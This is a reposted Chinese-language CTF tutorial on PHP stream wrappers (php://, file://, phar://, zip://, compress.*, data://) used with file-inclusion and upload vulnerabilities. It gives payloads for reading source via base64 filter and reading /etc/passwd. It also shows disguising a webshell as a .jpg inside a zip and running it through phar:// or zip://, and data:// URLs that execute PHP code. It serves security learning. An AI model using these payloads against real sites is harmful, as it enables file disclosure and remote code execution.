【CTF web入门-理论基础篇】PHP伪协议在CTF中的应用

PHP伪协议在CTF中经常出现，也经常跟文件包含，文件上传，命令执行等漏洞结合在一起，所以本文章对常见的一些协议进行总结。

文件包含是否支持%00截断取决于：

PHP版本<=5.2 可以使用%00进行截断。

php支持的伪协议有：

php:// — 访问各个输入/输出流（I/O streams）
file:// — 访问本地文件系统
phar:// — PHP 归档
zlib:// — 压缩流
data:// — 数据（RFC 2397）
http:// — 访问 HTTP(s) 网址
ftp:// — 访问 FTP(s) URLs
glob:// — 查找匹配的文件路径模式
ssh2:// — Secure Shell 2
rar:// — RAR
ogg:// — 音频流

expect:// — 处理交互式的流


1.php://协议

php://filter
php://input

php://filter：在allow_url_fopen，allow_url_include都关闭的情况下可以正常使用，主要用于读取源代码并进行base64编码输出。
payload如下：

php://filter/read=convert.base64-encode/resource=upload.php

php://input：访问各个输入/输出流。CTF中经常使用file_get_contents获取php://input内容(POST)，需要开启allow_url_include，并且当enctype=”multipart/form-data”的时候 php://input是无效的。

例子：https://www.jianshu.com/p/6d76f1dee19c

2.file://协议

file://：用于访问本地文件系统，并且不受allow_url_fopen，allow_url_include影响，file://还经常和curl函数(SSRF)结合在一起。

使用方法：

file:// [文件的绝对路径和文件名]
file:///etc/passwd
...

例子：https://www.jianshu.com/p/4c2b9e655e3c

3.phar://协议

phar://：PHP 归档，常常跟文件包含，文件上传结合着考察。当文件上传仅仅校验mime类型与文件后缀，可以通过以下命令进行利用。

nac.php(木马)->压缩->nac.zip->改后缀->nac.jpg->上传->phar://nac.jpg/nac.php

4.zlib://协议

zip://：在allow_url_fopen，allow_url_include都关闭的情况下可以正常使用，使用如下：

file.php?file=zip://[压缩文件绝对路径]#[压缩文件内的子文件名]
file.php?file=zip://nac.jpg#nac.php  其中get请求中#需要进行编码，即%23

bzip2://：在allow_url_fopen，allow_url_include都关闭的情况下可以正常使用，使用如下：

file.php?file=compress.bzip2://nac.bz2
file.php?file=compress.bzip2://./nac.jpg
file.php?file=compress.bzip2://D:/soft/phpStudy/WWW/file.jpg

zlib://：在allow_url_fopen，allow_url_include都关闭的情况下可以正常使用，使用如下：

file.php?file=compress.zlib://file.gz
file.php?file=compress.zlib://./nac.jpg
file.php?file=compress.zlib://D:/soft/phpStudy/WWW/file.jpg

5.data://协议

data://：需满足allow_url_fopen，allow_url_include同时开启才能使用，使用如下：

file.php?file=data://text/plain,<?php phpinfo()?>
file.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=
file.php?file=data:text/plain,<?php phpinfo()?>
file.php?file=data:text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=

转载自：https://www.jianshu.com/p/0a8339fcc269

本文始发于微信公众号（LemonSec）：【CTF web入门-理论基础篇】PHP伪协议在CTF中的应用